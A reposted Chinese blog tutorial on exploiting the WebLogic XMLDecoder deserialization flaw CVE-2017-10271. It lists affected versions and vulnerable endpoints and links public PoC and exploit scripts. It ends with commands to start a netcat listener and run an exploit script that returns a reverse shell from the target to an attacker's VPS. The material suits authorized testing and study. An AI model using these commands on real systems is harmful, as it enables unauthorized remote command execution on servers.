码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-10271 XMLDecoder 反序列化

时间:2020-04-11 09:58:22      阅读:73      评论:0      收藏:0      [点我收藏+]

标签:ati   python   请求   wrap   sync   12px   微软雅黑   psi   nat   

漏洞描述:WebLogic的 WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,执行任意命令

 

受影响WebLogic版本:

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0

 

漏洞检测工具

https://pan.baidu.com/s/1bpg3ppl

技术图片

 

 

手工验证

漏洞点在/wls-wsat/CoordinatorPortType,访问http://192.168.37.136:7001/wls-wsat/CoordinatorPortType

/_async/AsyncResponseService
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType111
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

出现如下图则证明存在该漏洞;

技术图片

 

 

POC可参考

https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961

https://github.com/RealBearcat/Oracle-WebLogic-CVE-2017-10271

 

利用python脚本

https://github.com/kkirsche/CVE-2017-10271

 

监听端口

nc -lvnp 8888

 

python 运行

python CVE-2017-10271.py -l vpsip -p 8888 -r http://目标ip:7001

技术图片

 

 成功返回shell

 

技术图片

 

CVE-2017-10271 XMLDecoder 反序列化

标签:ati   python   请求   wrap   sync   12px   微软雅黑   psi   nat   

原文地址:https://www.cnblogs.com/null1433/p/12677519.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!